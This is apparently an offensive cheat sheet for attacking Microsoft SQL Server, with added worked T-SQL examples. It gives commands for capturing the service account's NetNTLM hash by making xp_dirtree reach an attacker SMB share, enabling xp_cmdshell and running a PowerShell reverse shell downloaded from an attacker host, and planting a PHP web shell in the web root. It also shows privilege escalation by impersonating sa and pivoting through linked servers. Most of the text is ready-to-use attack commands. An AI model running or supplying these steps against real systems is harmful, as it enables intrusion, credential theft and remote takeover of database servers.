MSSQL
sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

Default system databases:
- master: keeps the information for an instance of SQL Server.
- msdb: used by SQL Server Agent.
- model: a template database copied for each new database.
- resource: a read-only database that keeps the system objects visible in every database on the server under the sys schema.
- tempdb: keeps temporary objects for SQL queries.
Log in to MSSQL remotely
sqsh -S $ip -U sa -P <PASSWORD>
Alternatively use impacket's mssqlclient.py with Windows authentication
mssqlclient.py user:password@$ip -windows-auth
or without -windows-auth (SQL authentication)
mssqlclient.py user:password@$ip
Interactive with MSSQL
Check whether the current login has sysadmin (SA-level) permissions, i.e. can enable xp_cmdshell (1 = yes, 0 = no)
select IS_SRVROLEMEMBER('sysadmin')
Run after spinning up an SMB server on the attacker host: the SQL Server service account authenticates to the share, so its NetNTLM hash can be captured
exec master..xp_dirtree '\\<attacker ip>\<share name>\',1,1
GO
EXEC master..xp_subdirs '\\10.10.110.17\share\'
GO
Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
Show Advanced Options
sp_configure 'show advanced options', '1'
RECONFIGURE
Enable xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
Download and run a PowerShell reverse shell via xp_cmdshell (single quotes inside the T-SQL string are doubled)
EXEC master..xp_cmdshell 'powershell -c "iex(new-object net.webclient).downloadstring(''http://AttackerIP/Invoke-PowerShellTcp.ps1'')"'
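The steps above, as one added example that is not from the original page: it checks the current login's rights, enables xp_cmdshell only if it is currently off, captures the command output into a table so it can be filtered, and then restores both options to their previous state. It assumes a sqlcmd session (GO-separated batches); the command `whoami /all` is only for illustration.

```sql
-- Added example (not from the original page). Assumes a sqlcmd session.
-- 1. Am I allowed to touch server-level configuration at all?
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
GO

-- 2. Current state: value_in_use = 1 means xp_cmdshell is already enabled
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
GO

-- 3. Enable only when needed (no-op if it is already on)
IF (SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell') = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END
GO

-- 4. Run the command and keep its output in a temp table so it can be queried;
--    xp_cmdshell returns one row per output line, NULL for the trailing blank line
CREATE TABLE #out (line NVARCHAR(4000));
INSERT INTO #out EXEC master..xp_cmdshell 'whoami /all';   -- illustrative command
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;
GO

-- 5. Put the configuration back (xp_cmdshell first, then hide advanced options)
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
GO
```

Every sp_configure change is written to the instance configuration and logged in the SQL Server error log, so re-disabling xp_cmdshell afterwards keeps the box in the state you found it rather than hiding anything from a defender reading that log.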
Enable File Write (Ole Automation Procedures)
sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
sp_configure 'Ole Automation Procedures', 1
GO
RECONFIGURE
GO

To write files through MSSQL we need to enable Ole Automation Procedures, which requires admin (sysadmin) privileges, and then execute the sp_OA* stored procedures to create the file.
Write File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
GO

Read File
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
GO

OPENROWSET with BULK allows reading any file in the operating system to which the SQL Server service account has read access; it requires the ADMINISTER BULK OPERATIONS permission (bulkadmin role) on the executing login.
Impersonate Existing Users
Identify Users that We Can Impersonate
select distinct b.name from sys.server_permissions a inner join sys.server_principals b on a.grantor_principal_id = b.principal_id where a.permission_name = 'IMPERSONATE'
GO

SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset (REVERT) or the session ends. Sysadmins can impersonate anyone by default, but for non-administrator users the privilege must be explicitly assigned.
Verifying our Current User and Role
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go

A returned value of 0 indicates we do not have the sysadmin role, but we can impersonate the sa user.
Impersonating the SA User
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
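The impersonation flow above as one added example (not from the original page): it enumerates the logins the current principal may impersonate together with whether each target is sysadmin, switches context, shows that ORIGINAL_LOGIN() still records the real login while SYSTEM_USER changes, and drops back with REVERT. It assumes, as on the page, that the current login has IMPERSONATE on `sa` and that the session starts in `master` so the target login can see the current database.

```sql
-- Added example (not from the original page). Assumes IMPERSONATE on 'sa' was granted.
USE master;   -- every login can access master, so the impersonated login will too
GO

-- Logins the current principal may impersonate, and whether each is worth it
SELECT DISTINCT p.name AS impersonatable_login,
       IS_SRVROLEMEMBER('sysadmin', p.name) AS target_is_sysadmin
FROM sys.server_permissions sp
JOIN sys.server_principals p ON sp.grantor_principal_id = p.principal_id
WHERE sp.permission_name = 'IMPERSONATE';
GO

-- Before: SYSTEM_USER and ORIGINAL_LOGIN() are the same, sysadmin = 0
SELECT SYSTEM_USER AS current_login,
       ORIGINAL_LOGIN() AS original_login,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
GO

EXECUTE AS LOGIN = 'sa';
-- After: SYSTEM_USER is now 'sa' and sysadmin = 1, but ORIGINAL_LOGIN() still
-- names the real login (this is what audit/XEvent sessions record)
SELECT SYSTEM_USER AS current_login,
       ORIGINAL_LOGIN() AS original_login,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
-- Anything run here executes with sa's rights, e.g. listing all SQL and Windows logins
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G');
REVERT;   -- drop back to the original context before the session ends
GO

-- Confirm the context was restored
SELECT SYSTEM_USER AS current_login_after_revert;
GO
```

The `IS_SRVROLEMEMBER('sysadmin', p.name)` column lets you skip impersonating logins that would not gain you anything; the ORIGINAL_LOGIN() output is the value a defender sees in SQL Server Audit, so impersonation changes your permissions but not who the audit trail attributes the actions to.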

It is recommended to run EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database. If the login you are trying to impersonate doesn't have access to the DB you are connected to, the statement returns an error; switch to master first with USE master.
We can now execute any command as a sysadmin, as the returned value 1 indicates.
Communicate with Other Databases with MSSQL
Identify linked Servers in MSSQL
SELECT srvname, isremote FROM sysservers
GO

isremote, where 1 means it is a remote server and 0 means it is a linked server. Execute a query on a linked server with EXECUTE ... AT (the linked server must have RPC out enabled):
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
GO
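An added example (not from the original page) that goes a step further than the single EXECUTE ... AT above: it enumerates linked servers through the current catalog view sys.servers (sysservers is the legacy compatibility view), shows which local login is mapped to which remote login, runs the same reconnaissance query through both EXECUTE AT and OPENQUERY, and then lists the remote instance's own linked servers so links can be followed hop by hop. The linked server name [10.0.0.12\SQLEXPRESS] is the page's own; the example assumes it exists and that the mapped remote login has the rights to read the remote catalog.

```sql
-- Added example (not from the original page). Assumes [10.0.0.12\SQLEXPRESS] is a configured link.
-- Linked servers with the flags that matter: is_rpc_out_enabled gates EXECUTE ... AT,
-- is_data_access_enabled gates OPENQUERY / four-part names
SELECT name, product, provider, data_source,
       is_linked, is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers;
GO

-- Which local login becomes which remote login on each link
-- (uses_self_credential = 1 means the caller's own credentials are forwarded)
SELECT s.name AS linked_server, l.remote_name, l.uses_self_credential
FROM sys.linked_logins l
JOIN sys.servers s ON l.server_id = s.server_id
WHERE s.is_linked = 1;
GO

-- Run a query on the remote side (requires rpc out = 1 on the link)
EXECUTE('SELECT @@servername, system_user, IS_SRVROLEMEMBER(''sysadmin'')')
    AT [10.0.0.12\SQLEXPRESS];
GO

-- Without rpc out, OPENQUERY still gives read-only pass-through
SELECT *
FROM OPENQUERY([10.0.0.12\SQLEXPRESS],
               'SELECT @@servername, system_user, IS_SRVROLEMEMBER(''sysadmin'')');
GO

-- Chaining: ask the remote instance for its own linked servers, then repeat from there
EXECUTE('SELECT name, is_rpc_out_enabled FROM sys.servers WHERE is_linked = 1')
    AT [10.0.0.12\SQLEXPRESS];
GO
```

If the remote mapped login turns out to be sysadmin while your local one is not, the remote instance is where xp_cmdshell should be enabled and run (via EXECUTE ... AT), since the link carries the remote login's privileges, not yours.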
